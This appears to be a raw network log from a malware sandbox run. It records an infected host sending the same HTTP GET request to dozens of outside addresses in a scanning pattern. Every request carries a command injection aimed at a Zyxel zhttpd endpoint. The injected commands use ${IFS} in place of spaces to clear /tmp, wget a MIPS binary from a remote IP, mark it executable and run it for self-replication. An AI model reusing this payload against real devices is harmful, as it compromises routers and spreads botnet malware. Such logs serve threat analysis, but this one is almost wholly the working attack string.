                                                        Jan 28, 2024 10:13:12.786850929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9404192.168.2.1448974207.65.149.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786890030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9405192.168.2.143595072.72.129.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786942959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9406192.168.2.143400837.247.165.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786958933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9407192.168.2.144934432.141.255.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786999941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9408192.168.2.1445032181.163.142.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787045956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9409192.168.2.143746219.18.54.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787081957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9410192.168.2.1443100154.225.114.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787100077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9411192.168.2.1452028172.117.1.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787163973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9412192.168.2.1457458124.249.232.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787189960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9413192.168.2.1434402171.30.72.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787233114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9414192.168.2.1443148114.104.20.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787271023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9415192.168.2.1440326123.42.235.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787328005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9416192.168.2.145393035.185.237.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787395000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9417192.168.2.1451800107.78.192.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787436008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9418192.168.2.1445998147.7.247.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787463903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9419192.168.2.1455610208.168.124.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787514925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9420192.168.2.1453808201.254.226.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787570953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9421192.168.2.1439842108.164.49.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787581921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9422192.168.2.144636069.95.39.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787617922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9423192.168.2.1445078138.223.189.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787678003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9424192.168.2.1445118211.32.76.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787774086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9425192.168.2.1457308114.231.33.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787838936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9426192.168.2.1434120101.65.107.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787842035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9427192.168.2.143509261.245.200.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787853956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9428192.168.2.1453458173.78.45.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787853956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9429192.168.2.1449096183.100.237.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787867069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9430192.168.2.1433342203.251.83.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787921906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9431192.168.2.1460388164.254.41.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787955999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9432192.168.2.143618678.208.0.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.787998915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9433192.168.2.1460462195.16.30.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788044930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9434192.168.2.145820235.140.205.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788077116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9435192.168.2.145163637.182.198.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788099051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9436192.168.2.144893458.208.179.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788152933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9437192.168.2.1439126106.108.177.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788208961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9438192.168.2.144432054.105.54.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788230896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9439192.168.2.145226462.122.147.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788290977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9440192.168.2.1455586213.179.115.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788335085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9441192.168.2.1443274197.39.90.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788388968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9442192.168.2.1447784176.5.124.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788419008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9443192.168.2.1448338107.24.237.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788460970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9444192.168.2.1446320160.101.110.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788501024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9445192.168.2.144283273.60.42.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788537979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9446192.168.2.14598945.150.197.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788570881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9447192.168.2.1454426190.253.211.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788602114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9448192.168.2.1448484161.202.239.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788640022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9449192.168.2.144343068.160.219.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788680077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9450192.168.2.1454652209.221.228.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788719893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9451192.168.2.1446556116.110.158.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788779974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9452192.168.2.1433860220.225.76.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788822889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9453192.168.2.1443476172.130.108.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788860083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9454192.168.2.1435092124.200.74.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788883924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9455192.168.2.143950219.195.79.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788902044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9456192.168.2.1450548172.36.53.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788940907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9457192.168.2.1456536223.94.62.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.788966894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9458192.168.2.1435632164.217.194.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789021015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9459192.168.2.1453284110.1.1.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789057016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9460192.168.2.143413453.174.209.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789086103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9461192.168.2.1439930163.12.193.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789145947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9462192.168.2.1449542217.179.235.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789170980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9463192.168.2.1452682188.106.84.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789222956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9464192.168.2.1436752119.173.119.128443
                                                        TimestampBytes transferredDirectionData
